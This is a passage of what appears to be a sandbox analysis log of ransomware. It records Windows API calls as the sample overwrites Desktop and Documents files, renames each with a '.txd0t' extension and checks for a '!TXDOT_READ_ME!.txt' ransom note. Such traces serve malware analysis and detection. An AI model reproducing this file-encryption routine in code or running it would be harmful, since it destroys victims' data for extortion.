psz1=0xe9d788, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0072.768] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\!TXDOT_READ_ME!.txt") returned 1 [0072.768] GetProcessHeap () returned 0xe30000 [0072.768] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d750 | out: hHeap=0xe30000) returned 1 [0072.768] CloseHandle (hObject=0x460) returned 1 [0072.769] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\GHZr_0qE96Rjj.avi" (normalized: "c:\\users\\fd1hvy\\desktop\\ghzr_0qe96rjj.avi"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\GHZr_0qE96Rjj.avi.txd0t" (normalized: "c:\\users\\fd1hvy\\desktop\\ghzr_0qe96rjj.avi.txd0t")) returned 1 [0072.770] SetEvent (hEvent=0x3f8) returned 1 [0072.770] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0072.771] StrCpyW (in: psz1=0x37ff490, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\jhscRm6vvE.csv" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\jhscRm6vvE.csv") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\jhscRm6vvE.csv" [0072.772] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\jhscRm6vvE.csv", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\jhscRm6vvE.csv.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\jhscRm6vvE.csv.txd0t" [0072.772] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\jhscRm6vvE.csv.txd0t") returned 0 [0072.772] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\jhscRm6vvE.csv", dwFileAttributes=0x80) returned 1 [0072.772] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\jhscRm6vvE.csv" (normalized: "c:\\users\\fd1hvy\\desktop\\jhscrm6vve.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x460 [0072.772] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=49175) returned 1 [0072.772] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.772] WriteFile (in: hFile=0x460, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0072.772] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xffff3de9, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.772] ReadFile (in: hFile=0x460, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0xc010, lpNumberOfBytesRead=0x37ff450, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff450*=0xc010, lpOverlapped=0x0) returned 1 [0072.773] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xffff3ff0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.774] WriteFile (in: hFile=0x460, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0xc010, lpNumberOfBytesWritten=0x37ff454, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff454*=0xc010, lpOverlapped=0x0) returned 1 [0072.774] FlushFileBuffers (hFile=0x460) returned 1 [0072.776] GetProcessHeap () returned 0xe30000 [0072.776] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0xfc) returned 0xecf9c0 [0072.776] StrCpyW (in: psz1=0xecf9c0, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\jhscRm6vvE.csv" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\jhscRm6vvE.csv") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\jhscRm6vvE.csv" [0072.776] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\jhscRm6vvE.csv") returned="jhscRm6vvE.csv" [0072.776] StrCpyW (in: psz1=0xecf9f8, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0072.776] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\!TXDOT_READ_ME!.txt") returned 1 [0072.776] GetProcessHeap () returned 0xe30000 [0072.776] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xecf9c0 | out: hHeap=0xe30000) returned 1 [0072.776] CloseHandle (hObject=0x460) returned 1 [0072.778] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\jhscRm6vvE.csv" (normalized: "c:\\users\\fd1hvy\\desktop\\jhscrm6vve.csv"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\jhscRm6vvE.csv.txd0t" (normalized: "c:\\users\\fd1hvy\\desktop\\jhscrm6vve.csv.txd0t")) returned 1 [0072.779] SetEvent (hEvent=0x3f8) returned 1 [0072.779] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0072.780] StrCpyW (in: psz1=0x37ff480, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\K7u1HHJ_-wyjZGJCddO.doc" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\K7u1HHJ_-wyjZGJCddO.doc") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\K7u1HHJ_-wyjZGJCddO.doc" [0072.780] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\K7u1HHJ_-wyjZGJCddO.doc", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\K7u1HHJ_-wyjZGJCddO.doc.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\K7u1HHJ_-wyjZGJCddO.doc.txd0t" [0072.780] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\K7u1HHJ_-wyjZGJCddO.doc.txd0t") returned 0 [0072.780] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\K7u1HHJ_-wyjZGJCddO.doc", dwFileAttributes=0x80) returned 1 [0072.780] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\K7u1HHJ_-wyjZGJCddO.doc" (normalized: "c:\\users\\fd1hvy\\desktop\\k7u1hhj_-wyjzgjcddo.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x460 [0072.780] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=94330) returned 1 [0072.780] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.781] WriteFile (in: hFile=0x460, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0072.781] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffe8d86, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.781] ReadFile (in: hFile=0x460, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x17070, lpNumberOfBytesRead=0x37ff440, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff440*=0x17070, lpOverlapped=0x0) returned 1 [0072.783] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffe8f90, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.783] WriteFile (in: hFile=0x460, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x17070, lpNumberOfBytesWritten=0x37ff444, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff444*=0x17070, lpOverlapped=0x0) returned 1 [0072.784] FlushFileBuffers (hFile=0x460) returned 1 [0072.787] GetProcessHeap () returned 0xe30000 [0072.787] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x10e) returned 0xed2788 [0072.787] StrCpyW (in: psz1=0xed2788, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\K7u1HHJ_-wyjZGJCddO.doc" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\K7u1HHJ_-wyjZGJCddO.doc") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\K7u1HHJ_-wyjZGJCddO.doc" [0072.787] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\K7u1HHJ_-wyjZGJCddO.doc") returned="K7u1HHJ_-wyjZGJCddO.doc" [0072.787] StrCpyW (in: psz1=0xed27c0, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0072.787] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\!TXDOT_READ_ME!.txt") returned 1 [0072.787] GetProcessHeap () returned 0xe30000 [0072.787] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed2788 | out: hHeap=0xe30000) returned 1 [0072.787] CloseHandle (hObject=0x460) returned 1 [0072.789] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\K7u1HHJ_-wyjZGJCddO.doc" (normalized: "c:\\users\\fd1hvy\\desktop\\k7u1hhj_-wyjzgjcddo.doc"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\K7u1HHJ_-wyjZGJCddO.doc.txd0t" (normalized: "c:\\users\\fd1hvy\\desktop\\k7u1hhj_-wyjzgjcddo.doc.txd0t")) returned 1 [0072.790] SetEvent (hEvent=0x3f8) returned 1 [0072.790] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0072.791] StrCpyW (in: psz1=0x37ff480, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\lDvQFP7B58nzHOr.m4a" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\lDvQFP7B58nzHOr.m4a") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\lDvQFP7B58nzHOr.m4a" [0072.791] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\lDvQFP7B58nzHOr.m4a", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\lDvQFP7B58nzHOr.m4a.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\lDvQFP7B58nzHOr.m4a.txd0t" [0072.791] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\lDvQFP7B58nzHOr.m4a.txd0t") returned 0 [0072.791] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\lDvQFP7B58nzHOr.m4a", dwFileAttributes=0x80) returned 1 [0072.792] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\lDvQFP7B58nzHOr.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\ldvqfp7b58nzhor.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x460 [0072.792] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=41756) returned 1 [0072.792] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.792] WriteFile (in: hFile=0x460, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0072.792] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xffff5ae4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.792] ReadFile (in: hFile=0x460, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0xa310, lpNumberOfBytesRead=0x37ff440, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff440*=0xa310, lpOverlapped=0x0) returned 1 [0072.793] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xffff5cf0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.793] WriteFile (in: hFile=0x460, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0xa310, lpNumberOfBytesWritten=0x37ff444, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff444*=0xa310, lpOverlapped=0x0) returned 1 [0072.793] FlushFileBuffers (hFile=0x460) returned 1 [0072.796] GetProcessHeap () returned 0xe30000 [0072.796] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x106) returned 0xe9d750 [0072.796] StrCpyW (in: psz1=0xe9d750, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\lDvQFP7B58nzHOr.m4a" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\lDvQFP7B58nzHOr.m4a") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\lDvQFP7B58nzHOr.m4a" [0072.796] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\lDvQFP7B58nzHOr.m4a") returned="lDvQFP7B58nzHOr.m4a" [0072.796] StrCpyW (in: psz1=0xe9d788, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0072.796] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\!TXDOT_READ_ME!.txt") returned 1 [0072.796] GetProcessHeap () returned 0xe30000 [0072.797] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d750 | out: hHeap=0xe30000) returned 1 [0072.797] CloseHandle (hObject=0x460) returned 1 [0072.798] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\lDvQFP7B58nzHOr.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\ldvqfp7b58nzhor.m4a"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\lDvQFP7B58nzHOr.m4a.txd0t" (normalized: "c:\\users\\fd1hvy\\desktop\\ldvqfp7b58nzhor.m4a.txd0t")) returned 1 [0072.799] SetEvent (hEvent=0x3f8) returned 1 [0072.799] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0072.800] StrCpyW (in: psz1=0x37ff480, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\OifmxvKJj07hQoi0y.ppt" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\OifmxvKJj07hQoi0y.ppt") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\OifmxvKJj07hQoi0y.ppt" [0072.800] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\OifmxvKJj07hQoi0y.ppt", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\OifmxvKJj07hQoi0y.ppt.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\OifmxvKJj07hQoi0y.ppt.txd0t" [0072.800] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\OifmxvKJj07hQoi0y.ppt.txd0t") returned 0 [0072.800] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\OifmxvKJj07hQoi0y.ppt", dwFileAttributes=0x80) returned 1 [0072.800] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\OifmxvKJj07hQoi0y.ppt" (normalized: "c:\\users\\fd1hvy\\desktop\\oifmxvkjj07hqoi0y.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x460 [0072.800] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=81766) returned 1 [0072.801] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.801] WriteFile (in: hFile=0x460, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0072.803] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffebe9a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.804] ReadFile (in: hFile=0x460, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x13f60, lpNumberOfBytesRead=0x37ff440, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff440*=0x13f60, lpOverlapped=0x0) returned 1 [0072.805] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffec0a0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.805] WriteFile (in: hFile=0x460, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x13f60, lpNumberOfBytesWritten=0x37ff444, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff444*=0x13f60, lpOverlapped=0x0) returned 1 [0072.806] FlushFileBuffers (hFile=0x460) returned 1 [0073.561] GetProcessHeap () returned 0xe30000 [0073.561] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x10a) returned 0xed2ad0 [0073.561] StrCpyW (in: psz1=0xed2ad0, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\OifmxvKJj07hQoi0y.ppt" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\OifmxvKJj07hQoi0y.ppt") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\OifmxvKJj07hQoi0y.ppt" [0073.561] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\OifmxvKJj07hQoi0y.ppt") returned="OifmxvKJj07hQoi0y.ppt" [0073.561] StrCpyW (in: psz1=0xed2b08, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0073.561] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\!TXDOT_READ_ME!.txt") returned 1 [0073.561] GetProcessHeap () returned 0xe30000 [0073.561] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed2ad0 | out: hHeap=0xe30000) returned 1 [0073.562] CloseHandle (hObject=0x460) returned 1 [0073.564] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\OifmxvKJj07hQoi0y.ppt" (normalized: "c:\\users\\fd1hvy\\desktop\\oifmxvkjj07hqoi0y.ppt"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\OifmxvKJj07hQoi0y.ppt.txd0t" (normalized: "c:\\users\\fd1hvy\\desktop\\oifmxvkjj07hqoi0y.ppt.txd0t")) returned 1 [0073.599] SetEvent (hEvent=0x3f8) returned 1 [0073.600] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0073.600] StrCpyW (in: psz1=0x37ff480, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\36V5IRtis-.pps" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\36V5IRtis-.pps") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\36V5IRtis-.pps" [0073.600] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\36V5IRtis-.pps", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\36V5IRtis-.pps.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\36V5IRtis-.pps.txd0t" [0073.600] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\36V5IRtis-.pps.txd0t") returned 0 [0073.600] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\36V5IRtis-.pps", dwFileAttributes=0x80) returned 1 [0073.884] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\36V5IRtis-.pps" (normalized: "c:\\users\\fd1hvy\\desktop\\t2ura\\36v5irtis-.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x460 [0073.884] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=4985) returned 1 [0073.987] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0073.987] WriteFile (in: hFile=0x460, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0074.000] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xffffea87, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.000] ReadFile (in: hFile=0x460, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x1370, lpNumberOfBytesRead=0x37ff440, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff440*=0x1370, lpOverlapped=0x0) returned 1 [0074.000] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xffffec90, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.000] WriteFile (in: hFile=0x460, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x1370, lpNumberOfBytesWritten=0x37ff444, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff444*=0x1370, lpOverlapped=0x0) returned 1 [0074.002] FlushFileBuffers (hFile=0x460) returned 1 [0074.007] GetProcessHeap () returned 0xe30000 [0074.007] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x108) returned 0xe9d750 [0074.007] StrCpyW (in: psz1=0xe9d750, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\36V5IRtis-.pps" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\36V5IRtis-.pps") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\36V5IRtis-.pps" [0074.007] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\36V5IRtis-.pps") returned="36V5IRtis-.pps" [0074.007] StrCpyW (in: psz1=0xe9d794, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0074.007] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\!TXDOT_READ_ME!.txt") returned 1 [0074.007] GetProcessHeap () returned 0xe30000 [0074.007] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d750 | out: hHeap=0xe30000) returned 1 [0074.007] CloseHandle (hObject=0x460) returned 1 [0074.014] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\36V5IRtis-.pps" (normalized: "c:\\users\\fd1hvy\\desktop\\t2ura\\36v5irtis-.pps"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\36V5IRtis-.pps.txd0t" (normalized: "c:\\users\\fd1hvy\\desktop\\t2ura\\36v5irtis-.pps.txd0t")) returned 1 [0074.023] SetEvent (hEvent=0x3f8) returned 1 [0074.023] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0074.032] StrCpyW (in: psz1=0x37ff490, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\aayLh9Av.xlsx" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\aayLh9Av.xlsx") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\aayLh9Av.xlsx" [0074.032] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\aayLh9Av.xlsx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\aayLh9Av.xlsx.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\aayLh9Av.xlsx.txd0t" [0074.032] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\aayLh9Av.xlsx.txd0t") returned 0 [0074.032] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\aayLh9Av.xlsx", dwFileAttributes=0x80) returned 1 [0074.033] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\aayLh9Av.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\aaylh9av.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x47c [0074.033] GetFileSizeEx (in: hFile=0x47c, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=6688) returned 1 [0074.033] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.033] WriteFile (in: hFile=0x47c, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0074.034] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0xffffe3e0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.034] ReadFile (in: hFile=0x47c, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x1a20, lpNumberOfBytesRead=0x37ff450, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff450*=0x1a20, lpOverlapped=0x0) returned 1 [0074.034] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0xffffe5e0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.034] WriteFile (in: hFile=0x47c, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x1a20, lpNumberOfBytesWritten=0x37ff454, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff454*=0x1a20, lpOverlapped=0x0) returned 1 [0074.034] FlushFileBuffers (hFile=0x47c) returned 1 [0074.056] GetProcessHeap () returned 0xe30000 [0074.056] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0xfe) returned 0xecf390 [0074.056] StrCpyW (in: psz1=0xecf390, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\aayLh9Av.xlsx" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\aayLh9Av.xlsx") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\aayLh9Av.xlsx" [0074.056] PathFindFileNameW 